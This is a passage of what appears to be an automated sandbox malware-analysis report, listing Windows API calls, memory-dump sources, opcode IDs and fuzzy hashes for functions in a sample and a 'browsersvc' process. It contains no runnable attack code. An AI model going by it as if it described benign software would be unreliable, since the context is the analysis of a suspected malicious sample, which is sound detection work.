                    • Part of subcall function 009FDA98: _strlen.LIBCMT ref: 009FDADF
                    • Part of subcall function 009FDA98: SetDlgItemTextW.USER32(?,00A2E154,?), ref: 009FDB3F
                    • Part of subcall function 009FDA98: GetWindowRect.USER32(?,?), ref: 009FDB79
                    • Part of subcall function 009FDA98: GetClientRect.USER32(?,?), ref: 009FDB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                  • SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  • Opcode ID: cae2b2381c46bd0d404b4f85e421dca56ea48bf864b184f0a47426ac934a7590
                  • Instruction ID: 52d8b0b7832cebde3a4d35c45412055d7943f9e0e89d8efc0869efb33d9dde17
                  • Opcode Fuzzy Hash: cae2b2381c46bd0d404b4f85e421dca56ea48bf864b184f0a47426ac934a7590
                  • Instruction Fuzzy Hash: A3F0AF3020834CEBDF254F608C09BFA3B9DBB21306F088414FF59549A1D7B8C995EB90
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00A00A78,?), ref: 00A00854
                  • GetLastError.KERNEL32(?), ref: 00A00860
                    • Part of subcall function 009F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F6EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00A00869
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  • Opcode ID: f77bb30de9a357a349d375caa92cd23b43975d182e5351538ce107ebc3b4c9ce
                  • Instruction ID: fe910522ff33843e2b33f80401f6c478817d6129da2b43b9bc11ff69e0c9abae
                  • Opcode Fuzzy Hash: f77bb30de9a357a349d375caa92cd23b43975d182e5351538ce107ebc3b4c9ce
                  • Instruction Fuzzy Hash: 9DD05E33A0C13077CA202768BC0AFBF7915AF93730F204724F239A51F5DA25096287E5
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,009FD32F,?), ref: 009FDA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,009FD32F,?), ref: 009FDA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  • Opcode ID: 5f9befad9ae2d6cb2493fc190436ca9851f21e2865c8f10ebf920f7cd2c9ab32
                  • Instruction ID: 80796ff19a4ea3d8cd906ded1c5bb6ddc4a715785fe7f07069f0ede60d5b167b
                  • Opcode Fuzzy Hash: 5f9befad9ae2d6cb2493fc190436ca9851f21e2865c8f10ebf920f7cd2c9ab32
                  • Instruction Fuzzy Hash: 44C0123338935076DF3057787C0DB6329486B12B11F05056CB241DA5D0D5E9C9428760
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  • Opcode ID: dc91ae4208b8d2d06eb2abeb543472126bf2ad1a90a61062593704798eb39262
                  • Instruction ID: ad77c69687697a817816b42cff0275a647175bd303e36ba2d73f1897e1aa3116
                  • Opcode Fuzzy Hash: dc91ae4208b8d2d06eb2abeb543472126bf2ad1a90a61062593704798eb39262
                  • Instruction Fuzzy Hash: DEA1C172A1994E8FEB58DB68C8697AC7BE1FF59314F5002BED01DD72D6DEB428018B40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 470ae8d0a3dfbd4c61bec70e886c42d6164606fea376d6aff36063b862b88735
                  • Instruction ID: 15239c11f37e7583b54517ae62b43cae25425d98d81673804ad9e4ecb8a0f75d
                  • Opcode Fuzzy Hash: 470ae8d0a3dfbd4c61bec70e886c42d6164606fea376d6aff36063b862b88735
                  • Instruction Fuzzy Hash: 63913703B0F6E50BE33163ED2C751E96F50DF51769B0D42F7E0A88A0E7EC5866468785
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f00dc2620e14f9ae27ba380080fd9ac9ea6ef14d12505ceedbfff7fbdbe20bd0
                  • Instruction ID: 9cbc23ae92ba34ae3cedc5a3e7836bd34ad55450a3a53deb9423a9b9f6b947cd
                  • Opcode Fuzzy Hash: f00dc2620e14f9ae27ba380080fd9ac9ea6ef14d12505ceedbfff7fbdbe20bd0
                  • Instruction Fuzzy Hash: 5A814843B0F6E50BE33163ED2C751E96F90DF51769B0942FBE0A88A0E7EC586646C784
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0893f01b0d172efb5aef016c6ed87ae6e6406e2315cd03ccbe254977a235d3e
                  • Instruction ID: e3549060fbc56a5a4b53d1cf68d266b33ac9b9b4d6eadc19f7f6dc09d3fc99b3
                  • Opcode Fuzzy Hash: b0893f01b0d172efb5aef016c6ed87ae6e6406e2315cd03ccbe254977a235d3e
                  • Instruction Fuzzy Hash: 4C816853B0FAD50BE33067EC6C651E97F90EF51365B0942FBE0A8CA0E7EC54A6468784
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c206fc7975da7790fd2efb7691bbc2ae4601ed903c2c136df3272f70e9eba674
                  • Instruction ID: 4947398d53e5c884a2d0fa4debc842be9b041fbdd788ba6d996f4eba676cd1e7
                  • Opcode Fuzzy Hash: c206fc7975da7790fd2efb7691bbc2ae4601ed903c2c136df3272f70e9eba674
                  • Instruction Fuzzy Hash: E7715843B0F6D50BE33163EC2C751E96F90EF51765B0942FBE0A8890E7EC5466468784
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3f4e8caeadd6b46c8ea231971ee46a206c18c8531f6bccc366c6490f20a8915
                  • Instruction ID: af35241bc98197fea4c31aa84c685cfa975307be41b7fb01e2c6b77ef175d8f8
                  • Opcode Fuzzy Hash: e3f4e8caeadd6b46c8ea231971ee46a206c18c8531f6bccc366c6490f20a8915
                  • Instruction Fuzzy Hash: 5A71F331F09A1D8FEBA8DB68C865FEDB3A1EF54310F0142B9D01DD71A6DE74AA458B40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1bc581bb9074776bfe1225467685a1d815152cfe78b38a904487d3ac6acf100e
                  • Instruction ID: 1c108e673fdb4558083ef58de195676daf57c374a9b3a6eca3b81835e913364a
                  • Opcode Fuzzy Hash: 1bc581bb9074776bfe1225467685a1d815152cfe78b38a904487d3ac6acf100e
                  • Instruction Fuzzy Hash: 5B61B031B2CA594BDB58DF5C88A15B977E2FFE8304B15416EE45EC3296DE30A902CB81
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 460b6296304f303a84f5a017253220775de1fd5cff00f51b07488f0d5c769181
                  • Instruction ID: 0df8b5824df96c25e46c927a7c492a82d2440890a8c871d68d2ad4281f120d82
                  • Opcode Fuzzy Hash: 460b6296304f303a84f5a017253220775de1fd5cff00f51b07488f0d5c769181
                  • Instruction Fuzzy Hash: 75513270E09A1D9FEBA4EBA8C859ABDB7F1FF58300F11016DD01DE32A5DE7569418B40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 358a3246b4b15edb741c23dc8cb7fc6c3ca99af9d1022126d2fe8fdaee2b8db2
                  • Instruction ID: 5e058002bfd338d6780d8f5aea8dc24b287e610eb8813d7ca9e2b7d8761bc103
                  • Opcode Fuzzy Hash: 358a3246b4b15edb741c23dc8cb7fc6c3ca99af9d1022126d2fe8fdaee2b8db2
                  • Instruction Fuzzy Hash: D1512B71E0A52E8FEB64EB98C4646EDBBF1FF58300F41417AD019E71A1DA786A44CF00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84c940a0b7937a0602e0f4c4435a3966f5a6300358fb029c0a334d0397640b28
                  • Instruction ID: 46e672f8d9696a3d6b607035e5e9576ddb95a48e5c01069ce7b10a9099cd6cdf
                  • Opcode Fuzzy Hash: 84c940a0b7937a0602e0f4c4435a3966f5a6300358fb029c0a334d0397640b28
                  • Instruction Fuzzy Hash: AB417C31B0E75E0FD365DBB8A8651B87BD0EF86310F0545BBD46CC71B2DE68A9418741
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4457bbde0e37bb637b2575fb641090aa1b039a3fed293cb5af7c7d3a41db56b6
                  • Instruction ID: b569f575578c4251c558350d549b206fda08f6d16487d711e77ff449ad74d2cb
                  • Opcode Fuzzy Hash: 4457bbde0e37bb637b2575fb641090aa1b039a3fed293cb5af7c7d3a41db56b6
                  • Instruction Fuzzy Hash: 8D318416A0E2961AE321B3FC7C755E63F909F1623EF0942F3E5AD890E3ED086549C295
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e9bf99f99b26c670b82ee09e8b260aa997b21c3bb6b444fb1a66edbc48d6c16
                  • Instruction ID: fb818604c15858e0cd456b6b6a88f07c879f4cf70b0046ae638e23c6a006ec7f
                  • Opcode Fuzzy Hash: 6e9bf99f99b26c670b82ee09e8b260aa997b21c3bb6b444fb1a66edbc48d6c16
                  • Instruction Fuzzy Hash: 9D31D422A0E79A1FE751A7B89C355E57FA0EF1231AF0A41F3D4588B0A3E9186548C751
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 512a2f0a8e726a9f601bf589be42c2f4fea282d57c6d73b7d316033a5bcb8750
                  • Instruction ID: 660ad56e7b77de7951027f272d2c7b8ce459dae9c84b47dbeebd9fba01bc13ff
                  • Opcode Fuzzy Hash: 512a2f0a8e726a9f601bf589be42c2f4fea282d57c6d73b7d316033a5bcb8750
                  • Instruction Fuzzy Hash: A0219B62B0E69A57E73467FD9C392E93B90EF11759F0941BBD0ACC9093EC14A209C6C4
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0f089f11b8413996d53cae0695e154b6fbb9f7a05cf69a8dfdc3467e09a895f
                  • Instruction ID: 6d4ba27b6b26c2aa9f950c1d08cc4ed172f81d5ba9ea1bcb79c6975c7706d45f
                  • Opcode Fuzzy Hash: e0f089f11b8413996d53cae0695e154b6fbb9f7a05cf69a8dfdc3467e09a895f
                  • Instruction Fuzzy Hash: DD21CF3094E69A4FD757ABB488685A93FF0EF0A300F0604F7D458CB0B2DA789545CB11
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd60ccfceac13f0dca681507ee4763c251168f331afd735786ebd34340aa31b4
                  • Instruction ID: 91f0a2c2b9c5d5e4a50f3628c6db814ac2ccfee693f177a94dbad4860302aa35
                  • Opcode Fuzzy Hash: cd60ccfceac13f0dca681507ee4763c251168f331afd735786ebd34340aa31b4
                  • Instruction Fuzzy Hash: B121C575E0962D8FEB64EBD8C8646ADBBF1FF58300F51416AD019E72A5CA786941CF00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2931721c01dcc50c0c6996941a12c192037349fb9fb025f66956f048d8dd4128
                  • Instruction ID: 006eefd321f76f14604eacb7911265b2573cc90923a1c83f1e534b15f172afd9
                  • Opcode Fuzzy Hash: 2931721c01dcc50c0c6996941a12c192037349fb9fb025f66956f048d8dd4128
                  • Instruction Fuzzy Hash: 0611C831E1951E4FE7A0EBA8C8595FD7BE0FF58700F41497AD42CC70A6DE74A5408B40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23841dfde0d8dc4a1eda6aa305943b1662a16b905d38381ee9bb8014439ad7ed
                  • Instruction ID: ee2115d2536d8af7edbdb77e54d5f7305eee43e652841e64525e64d09c35d40e
                  • Opcode Fuzzy Hash: 23841dfde0d8dc4a1eda6aa305943b1662a16b905d38381ee9bb8014439ad7ed
                  • Instruction Fuzzy Hash: F311B631E1A55E4EEB68DBA484B96B97BE0FF65300F0104BEC029C60E1DE755640CB00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cbb65223fe63aaeeaf8a0b5814d06c01984cad3131363e922303640473c54271
                  • Instruction ID: 8fbea79c47a541e375255fd7c3e3d51cb2060307ad4ec7f511f396a8be5c387f
                  • Opcode Fuzzy Hash: cbb65223fe63aaeeaf8a0b5814d06c01984cad3131363e922303640473c54271
                  • Instruction Fuzzy Hash: D6113070A0965E8FDB59EB64C8696B97BE0FF18300F4105BED42AD71A1DA75A5408B01
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bcf0178cc33d65ab78ae910031ed16e6dc7b82cf9254e3d232e094c84283f833
                  • Instruction ID: c54626af9d42008234e287b2f959746cc6b6b9af174913885b52e0da336c224c
                  • Opcode Fuzzy Hash: bcf0178cc33d65ab78ae910031ed16e6dc7b82cf9254e3d232e094c84283f833
                  • Instruction Fuzzy Hash: 8C01B530A1551E8FDB98EF65C4646B977E1FF69304F11447ED42EC21A4CE71A660CF40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54283e09cc6a928d1604451fac7a56aa81300e9c158df0e29469a32e73411b49
                  • Instruction ID: 5ff7b0a01c0c6b5cfcb559972f9c0810f3a8fdc06da580dd4a6ce75a43301412
                  • Opcode Fuzzy Hash: 54283e09cc6a928d1604451fac7a56aa81300e9c158df0e29469a32e73411b49
                  • Instruction Fuzzy Hash: C4018431E1A65E8FE765ABE494585F97FE0FF19300F4245B6D428C70B6EA74E1408B40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aba7cb98aec31d6b4489360f8fd7b86eba44ab8ac8b8828cb3f12eed2c875e0e
                  • Instruction ID: c9f0e3c7128eb46733705e7cebbd78c7a11ce955e924bb669cd87154520ede07
                  • Opcode Fuzzy Hash: aba7cb98aec31d6b4489360f8fd7b86eba44ab8ac8b8828cb3f12eed2c875e0e
                  • Instruction Fuzzy Hash: EE01F93091A68E8FDB64DF54C4656F97BE0FF66300F51047EE82CC21A1DBB59560CB40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a03ebb7a6a051c68f52208847b547c9335d4f4438a0a2fe8f045d6792b3a5515
                  • Instruction ID: 0c9531adbdbc24fc17d9588cd9bb9ac4242b277f1e6bcb9c54e3ccb510a94087
                  • Opcode Fuzzy Hash: a03ebb7a6a051c68f52208847b547c9335d4f4438a0a2fe8f045d6792b3a5515
                  • Instruction Fuzzy Hash: B5018430A1E75E4FE752EBB494695A97FE0EF06304F4648B3D418C70B6DA38A5548B01
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6299ca2b821506c9df8edd4efd0561e31b7c9be7e151bb4f70008aa34d561aa9
                  • Instruction ID: 9f0ce233e7f39b9617662dcc88c2fcb9bb7c7a0a76a4d869a0d199ed9bf43c88
                  • Opcode Fuzzy Hash: 6299ca2b821506c9df8edd4efd0561e31b7c9be7e151bb4f70008aa34d561aa9
                  • Instruction Fuzzy Hash: F1018630A1961E8AEB58EFA4D4695B977A0FF18305F11487FD42EC21E5DF75A590CF00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 321392d902f06d45130a8ce963414097f6abcea37ef7454fee53f66e7d76141b
                  • Instruction ID: 885c8a0fdb5bbbc0463b56b57e81f823b4afa3fbc260374ef72141c5bc0f841a
                  • Opcode Fuzzy Hash: 321392d902f06d45130a8ce963414097f6abcea37ef7454fee53f66e7d76141b
                  • Instruction Fuzzy Hash: 8F018130A1560E9FEB68EBA4D4686B97BA0FF18305F51487FD42EC61E5DE75A290CE00
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ccd194bde76f0e86f69451e824488fe3ce04a301f4ceab0eeb7bf6591c58934
                  • Instruction ID: 07b1b96750f68d79bc876f5ef795a2fecab04759570d4f6eefe12e8007493f38
                  • Opcode Fuzzy Hash: 6ccd194bde76f0e86f69451e824488fe3ce04a301f4ceab0eeb7bf6591c58934
                  • Instruction Fuzzy Hash: A2F0FC30A1A55E8FDB64EF65D4655FA77A0FF25308F11057AE82DC20E1CA75A660CF40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 55608cc8436fc819b0a10414349869821e116019f6d13c6b76de32aa4d577744
                  • Instruction ID: 4b909795897e4bc5db432ea06dbaeb41d6741b1b11519fffe01b335dbcbe50ca
                  • Opcode Fuzzy Hash: 55608cc8436fc819b0a10414349869821e116019f6d13c6b76de32aa4d577744
                  • Instruction Fuzzy Hash: 08F0C831E2A56E4AEB649BE498796F976E0FF65304F00043ED42DC20E1EEB816548A40
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17aa570abdd84dbf9b398e33e14e97ca5ba5f6976663ebfb4a392eff48d3d2dd
                  • Instruction ID: 5177cb7cefb367cc54fd2e70e2ec01f83261ebe42577bfaed0bf921d0f361849
                  • Opcode Fuzzy Hash: 17aa570abdd84dbf9b398e33e14e97ca5ba5f6976663ebfb4a392eff48d3d2dd
                  • Instruction Fuzzy Hash: DFF0963191A38E8FDB699FA498641A93B60FF06304F4604BBD419C60E2DB786554CF01
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4e4f49ce91a42fe14e71b20c314ab7cc7bf30bd8c6c226bc2dfdf9b1fe26550
                  • Instruction ID: 3ba21b3edb5d845a16340be4eac719a1db043e37d97f149c8553724190b8df43
                  • Opcode Fuzzy Hash: c4e4f49ce91a42fe14e71b20c314ab7cc7bf30bd8c6c226bc2dfdf9b1fe26550
                  • Instruction Fuzzy Hash: 0CF0F030A1E78E8FEB689FA088252A93FA0FF05300F0204BBD419C21E2DB7995908B01
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07479a9427f1245ca480b36f48194c8bbb18d05b8a8e85b4956afd2d83bbe1fd
                  • Instruction ID: d12385edbcaf171eee7be92093b2e37f8d023eb208754288d7efe008b31cdc33
                  • Opcode Fuzzy Hash: 07479a9427f1245ca480b36f48194c8bbb18d05b8a8e85b4956afd2d83bbe1fd
                  • Instruction Fuzzy Hash: 17018870A5A22ACFEB60CF58C8607A8B6B1BB59300F1144E9D05DA2291CB75AA808F10
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
